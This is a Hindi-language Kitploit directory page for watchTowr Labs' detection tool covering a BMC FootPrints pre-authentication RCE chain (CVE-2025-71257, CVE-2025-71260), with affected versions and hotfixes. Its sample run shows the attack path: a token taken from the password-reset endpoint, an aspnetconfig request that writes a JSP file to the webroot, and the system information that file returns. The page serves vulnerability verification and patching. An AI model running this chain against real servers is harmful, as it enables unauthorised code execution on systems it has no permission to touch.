Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260 — पूर्व-प्रमाणित RCE श्रृंखला (CVE-2025-71257, CVE-2025-71260) के लिए BMC FootPrints इंस्टेंस का सत्यापन करने वाला डिटेक्शन आर्टिफैक्ट जनरेटर, जो प्रमाणीकरण को दरकिनार करके और सिस्टम जानकारी को सूचीबद्ध करने के लिए एक JSP फ़ाइल लिखकर काम करता है। | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-bmc-footprints-rce-cve-2025-71257-cve-2025-71260
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubwatchtowrlabs/watchtowr-vs-bmc-footprints-rce-cve-2025-71257-cve-2025-71260

watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260

पूर्व-प्रमाणित RCE श्रृंखला (CVE-2025-71257, CVE-2025-71260) के लिए BMC FootPrints इंस्टेंस का सत्यापन करने वाला डिटेक्शन आर्टिफैक्ट जनरेटर, जो प्रमाणीकरण को दरकिनार करके और सिस्टम जानकारी को सूचीबद्ध करने के लिए एक JSP फ़ाइल लिखकर काम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-71257 और CVE-2025-71260 BMC FootPrints पूर्व-प्रमाणीकृत रिमोट कोड निष्पादन श्रृंखला

BMC FootPrints पूर्व-प्रमाणीकृत रिमोट कोड निष्पादन श्रृंखला पहचान कलाकृति जनरेटर उपकरण

विवरण

यह डिटेक्शन आर्टिफैक्ट जनरेटर जांचता है कि क्या BMC FootPrints इंस्टेंस CVE-2025-71257 और CVE-2025-71260 के प्रति कमजोर है।

डिटेक्शन आर्टिफैक्ट जनरेटर दो संचालन करने का प्रयास करता है:

  • CVE-2025-71257 के साथ प्रमाणीकरण को बायपास करना - यह जांच बहुत सटीक है।
  • यदि यह सफल होता है, तो यह tomcat सर्वर के वेबरूट में एक रैंडमाइज़्ड .jsp फ़ाइल लिखकर CVE-2025-71260 RCE को सत्यापित करने का प्रयास करता है। यह .jsp फ़ाइल केवल सिस्टम जानकारी की गणना करती है।

कार्रवाई में पहचान

कमजोर उदाहरण के विरुद्ध परीक्षण:

root@kitploit:~
python3 watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py http://192.168.2.2
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py

        (*) BMC Footprints Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-71257, CVE-2025-71260]
        
============================================================
Detection Artifact Generator Tool
============================================================
Target: http://192.168.2.2

[+] Making first request to: http://192.168.2.2/footprints/servicedesk/passwordreset/request/
[+] Successfully extracted SEC_TOKEN: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h

[+] Making second request to: http://192.168.2.2footprints/servicedesk/aspnetconfig
[+] Using token: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Using randomized JSP name: MNdeu12Wf

[+] Making third request to: http://192.168.2.2/MNdeu12Wf.jsp (randomized artifact)

==================================================
EXTRACTED INFORMATION:
==================================================
Username: LOCAL SERVICE
Working Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0
==================================================

[+] Detection Artifact Generator Completed!

प्रभावित संस्करण

BMC FootPrints: 20.20.02 से 20.24.01.001 तक

उपलब्ध हॉटफिक्स

20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, 20.24.01

संदर्भ: https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/

watchTowr Labs का अनुसरण करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

टूल डाउनलोड करें